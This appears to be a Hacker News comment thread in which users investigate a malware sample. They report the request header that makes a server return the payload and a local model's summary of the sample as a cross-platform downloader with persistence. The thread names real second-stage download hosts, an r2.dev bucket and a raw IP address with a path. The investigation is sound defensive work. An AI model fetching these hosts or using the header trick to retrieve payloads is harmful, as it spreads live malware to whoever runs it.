upvote

points

by throwawayffffas7 hours ago |
comments
upvoteby berkes7 hours ago|
next
[-]
Same here.

I tried content-types, user-agent, but no luck. I'm not sure what the user-agent of `req` is, but the default `node-fetch/1.0` does make the response json. They are a 307, but the result is a png.

I presume the original payload may have contained information that the hackers want to keep from prying eyes. Esp. now that it landed on HN, it makes sense to take it offline and replace with an actual png to avoid people finding information in it that may harm their future hacks or so?

reply
upvoteby throwawayffffas7 hours ago|
parent|
[-]
Got it after adding the header: `bearrtoken: logo`.

Without seeing the request code I initially assumed it would be `Authorization: Bearer logo` that did the trick.

reply
upvoteby throwawayffffas6 hours ago|
prev|
[-]
So fed it to qwen. It seems to think it just a downloader and persistence mechanism for another payload. I will try to download it too and see what qwen thinks of that.
reply
upvoteby jimijazz4 hours ago|
parent|
[-]
thanks for following down the rabbit hole, let us know what you find! also... why qwen?
reply
upvoteby throwawayffffas2 hours ago|
parent|
[-]
> why qwen

I have it running locally, and i don't want to add credentials to the vm with the malware.

According to qwen:

It's cross platform

It has a bunch of persistence mechanisms.

It downloads another pack from pub-1fe39d600a4447ba895ef1c848d32e7e.r2.dev, Verified I got the secondary payload

This pack looks like a python 3.10 environment along with an executable called cupsd.

And downloads another js script from http://138.201.125.58:1224/client/99/77

That script then proceeds to download three python scripts that use the aforementioned python environment and do their business, qwen is having trouble de-obfuscating their urls and I am busy.

reply